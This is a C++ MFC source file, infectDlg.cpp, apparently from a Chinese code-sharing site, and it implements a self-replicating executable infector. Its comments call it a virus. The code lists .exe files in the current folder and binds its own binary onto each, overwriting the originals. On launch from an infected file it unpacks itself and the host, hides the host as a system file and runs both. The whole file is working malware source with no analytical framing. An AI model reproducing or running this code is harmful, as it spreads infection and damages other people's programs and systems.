📄 infectdlg.cpp
字号:
// infectDlg.cpp : implementation file
//
#include "stdafx.h"
#include "infect.h"
#include "infectDlg.h"
#ifdef _DEBUG
#define new DEBUG_NEW
#undef THIS_FILE
static char THIS_FILE[] = __FILE__;
#endif
/////////////////////////////////////////////////////////////////////////////
// CInfectDlg dialog
CInfectDlg::CInfectDlg(CWnd* pParent /*=NULL*/)
: CDialog(CInfectDlg::IDD, pParent)
{
//{{AFX_DATA_INIT(CInfectDlg)
// NOTE: the ClassWizard will add member initialization here
//}}AFX_DATA_INIT
// Note that LoadIcon does not require a subsequent DestroyIcon in Win32
}
void CInfectDlg::DoDataExchange(CDataExchange* pDX)
{
CDialog::DoDataExchange(pDX);
//{{AFX_DATA_MAP(CInfectDlg)
DDX_Control(pDX, IDC_LIST, m_list);
//}}AFX_DATA_MAP
}
BEGIN_MESSAGE_MAP(CInfectDlg, CDialog)
//{{AFX_MSG_MAP(CInfectDlg)
ON_WM_PAINT()
ON_WM_QUERYDRAGICON()
//}}AFX_MSG_MAP
END_MESSAGE_MAP()
/////////////////////////////////////////////////////////////////////////////
// CInfectDlg message handlers
BOOL CInfectDlg::OnInitDialog()
{
CDialog::OnInitDialog();
m_hIcon = AfxGetApp()->LoadIcon(IDR_MAINFRAME);
// Set the icon for this dialog. The framework does this automatically
// when the application's main window is not a dialog
SetIcon(m_hIcon, TRUE); // Set big icon
SetIcon(m_hIcon, FALSE); // Set small icon
// TODO: Add extra initialization here
//读取自身路径
char self[MAX_PATH];
::GetModuleFileName(NULL,self,MAX_PATH);
CString strCurrentFile;
strCurrentFile.Format("%s",self);
//获取当前文件夹位置
char CurrentFolder[MAX_PATH];
::GetCurrentDirectory(MAX_PATH,CurrentFolder);//与其他情况有所不同
CString strCurrentDir;
strCurrentDir.Format("%s",CurrentFolder);
//查找当前盘符下执行程序
ExeFileFind(strCurrentDir);
//判断自身是否为绑定
if(IsBind(strCurrentFile))
{
//定义宿主文件名
CString host;
host=strCurrentFile+".exe";
UnBind2File(strCurrentFile,"infect.exe",host);
SetFileAttributes(host,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM);
Create_Process("infect.exe",false);
Create_Process(host,false);
exit(0);
}
//主体,进行绑定
CString strfilename;
int Total=m_list.GetCount();
CString FirstFile,SecondFile,OutFile;
for(int i=0;i<Total;i++)
{
FirstFile = strCurrentFile;
m_list.GetText(i,strfilename);
SecondFile = strfilename;
OutFile = "Bind"+strfilename;
//当所选文件不为原病毒文件和有绑定标志文件,进行绑定
if(!IsBind(SecondFile)&&SecondFile!="infect.exe")
Bind2File(FirstFile,SecondFile,OutFile);
}
exit(0);
return TRUE; // return TRUE unless you set the focus to a control
}
// If you add a minimize button to your dialog, you will need the code below
// to draw the icon. For MFC applications using the document/view model,
// this is automatically done for you by the framework.
void CInfectDlg::OnPaint()
{
if (IsIconic())
{
CPaintDC dc(this); // device context for painting
SendMessage(WM_ICONERASEBKGND, (WPARAM) dc.GetSafeHdc(), 0);
// Center icon in client rectangle
int cxIcon = GetSystemMetrics(SM_CXICON);
int cyIcon = GetSystemMetrics(SM_CYICON);
CRect rect;
GetClientRect(&rect);
int x = (rect.Width() - cxIcon + 1) / 2;
int y = (rect.Height() - cyIcon + 1) / 2;
// Draw the icon
dc.DrawIcon(x, y, m_hIcon);
}
else
{
CDialog::OnPaint();
}
}
// The system calls this to obtain the cursor to display while the user drags
// the minimized window.
HCURSOR CInfectDlg::OnQueryDragIcon()
{
return (HCURSOR) m_hIcon;
}
BOOL CInfectDlg::Bind2File(LPCTSTR lpszFileIn1,LPCTSTR lpszFileIn2,LPCTSTR lpszFileOut)
{
BOOL bRet = FALSE;
CFile fileOut, fileIn1, fileIn2;
if(fileOut.Open(lpszFileOut, CFile::modeCreate | CFile::modeWrite | CFile::typeBinary))
{
if(fileIn1.Open(lpszFileIn1, CFile::modeRead | CFile::typeBinary))
{
if(fileIn2.Open(lpszFileIn2, CFile::modeRead | CFile::typeBinary))
{
const int buf_size = 1024;
LPVOID lpBuffer = new BYTE[buf_size];
//将filein1写出到fileOut
while(1)
{
int nReadSize = fileIn1.Read(lpBuffer, buf_size);
fileOut.Write(lpBuffer, nReadSize);
if(nReadSize < buf_size) //表示已经读完
break ;
}
//将filein2写出到fileOut
while(1)
{
int nReadSize = fileIn2.Read(lpBuffer, buf_size);
fileOut.Write(lpBuffer, nReadSize);
if(nReadSize < buf_size) //表示已经读完
break ;
}
// write bind flag to fileout
BIND_FLAG bf;
bf.dwLen = fileIn2.GetLength();
bf.dwFlag = BINDFLAG;
fileOut.Write(&bf, sizeof(bf));
delete []lpBuffer;
fileIn2.Close();
bRet = TRUE;
}
fileIn1.Close();
}
fileOut.Close();
}
else DeleteFile(lpszFileOut);
DeleteFile(lpszFileIn2);
MoveFile(lpszFileOut,lpszFileIn2);
return bRet;
}
bool CInfectDlg::IsBind(LPCTSTR lpszFile)
{
bool bRet = false;
CFile file;
if(file.Open(lpszFile, CFile::modeRead | CFile::typeBinary))
{
if(file.GetLength() > sizeof(BIND_FLAG))
{
BIND_FLAG bf;
ZeroMemory(&bf, sizeof(bf));
file.Seek(-1 * (int)sizeof(bf), CFile::end);
file.Read(&bf, sizeof(bf));
bRet = bf.dwFlag == BINDFLAG;
}
file.Close();
}
return bRet;
}
BOOL CInfectDlg::IsExeFile(CString FileName)
{
CString Ext,filename = FileName;
filename.MakeLower(); //转为小写
int filelong=filename.GetLength(); //文件长度
Ext = filename.Mid(filelong-3,3); //倒数三个是否为exe
if(Ext == "exe") return 1;
else return 0;
}
void CInfectDlg::ExeFileFind(CString str)
{
CString szFileName;
CString szDir=str;
if (szDir.Right(1)!="\\") szDir+="\\";
szDir+="*.*";
CFileFind ff;
BOOL bfile=ff.FindFile(szDir);
while (bfile)
{
bfile=ff.FindNextFile();
if ( !ff.IsDirectory() && ff.IsDots() )
ExeFileFind(ff.GetFilePath());
else if ( !ff.IsDots() && !ff.IsDirectory() )
{
szFileName=ff.GetFileName();
if(IsExeFile(szFileName))//判断是否为执行程序
ExeFileAdd(szFileName);
}
}
ff.Close();
}
void CInfectDlg::ExeFileAdd(CString m_add)
{
m_add.TrimRight();
m_add.TrimLeft();
if(!m_add.IsEmpty())
m_list.AddString(m_add);
}
BOOL CInfectDlg::UnBind2File(LPCTSTR lpszFileIn, LPCTSTR lpszFileOut1, LPCTSTR lpszFileOut2)
{
BOOL bRet = FALSE;
CFile fileIn, fileOut1, fileOut2;
if(fileOut1.Open(lpszFileOut1, CFile::modeCreate | CFile::modeWrite | CFile::typeBinary))
{
if(fileOut2.Open(lpszFileOut2, CFile::modeCreate | CFile::modeWrite | CFile::typeBinary))
{
if(fileIn.Open(lpszFileIn, CFile::modeRead | CFile::typeBinary))
{
const int nLen = fileIn.GetLength();
// file min size is sizof(BIND_FLAG)
if(nLen >= sizeof(BIND_FLAG))
{
BIND_FLAG bf;
ZeroMemory(&bf, sizeof(bf));
fileIn.Seek(-1 * (int)sizeof(bf), CFile::end);
fileIn.Read(&bf, sizeof(bf));
// check file bind flag, and file length > sizeof(bf) + bf.dwLen
if((bf.dwFlag == BINDFLAG) && (nLen >= (int)(sizeof(bf) + bf.dwLen)))
{
const int buf_size = 1024;
LPVOID lpBuffer = new BYTE[buf_size];
fileIn.SeekToBegin();
// write filein to fileout1
int nWriteLen = nLen - bf.dwLen - sizeof(BIND_FLAG);
for(int i = 0; i < (int)nWriteLen / buf_size; i ++)
{
int nReadSize = fileIn.Read(lpBuffer, buf_size);
fileOut1.Write(lpBuffer, nReadSize);
ASSERT(nReadSize == buf_size);
}
if(nWriteLen % buf_size > 0)
{
int nReadSize = fileIn.Read(lpBuffer, nWriteLen % buf_size);
ASSERT(nReadSize == (int)nWriteLen % buf_size);
fileOut1.Write(lpBuffer, nReadSize);
}
// write filein to fileout2
fileIn.Seek(-1 * (sizeof(bf) + bf.dwLen), CFile::end);
for(i = 0; i < (int)bf.dwLen / buf_size; i ++)
{
int nReadSize = fileIn.Read(lpBuffer, buf_size);
fileOut2.Write(lpBuffer, nReadSize);
ASSERT(nReadSize == buf_size);
}
if(bf.dwLen % buf_size > 0)
{
int nReadSize = fileIn.Read(lpBuffer, bf.dwLen%buf_size);
ASSERT(nReadSize == (int)bf.dwLen % buf_size);
fileOut2.Write(lpBuffer, nReadSize);
}
delete []lpBuffer;
fileIn.Close();
bRet = TRUE;
}
}
// write bind flag to fileout
BIND_FLAG bf;
bf.dwLen = fileOut2.GetLength();
bf.dwFlag = BINDFLAG;
fileOut2.Write(&bf, sizeof(bf));
}
fileOut2.Close();
}
fileOut1.Close();
}
return bRet;
}
void CInfectDlg::Create_Process(const char *temp_exe, BOOL async)
{
HANDLE hProcess;
HANDLE hThread;
PROCESS_INFORMATION PI;
STARTUPINFO SI;
memset(&SI, 0, sizeof(SI));
SI.cb = sizeof(SI);
CreateProcess(temp_exe,NULL,NULL,NULL,FALSE,NORMAL_PRIORITY_CLASS,NULL,NULL,&SI,&PI);
hProcess = PI.hProcess;
hThread = PI.hThread;
//异步执行时,执行后不删除分解后的文件;同步执行时,执行后删除分解后的文件
if (!async) //同步执行
{
WaitForSingleObject(hProcess, INFINITE);
unlink(temp_exe);
}
}
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -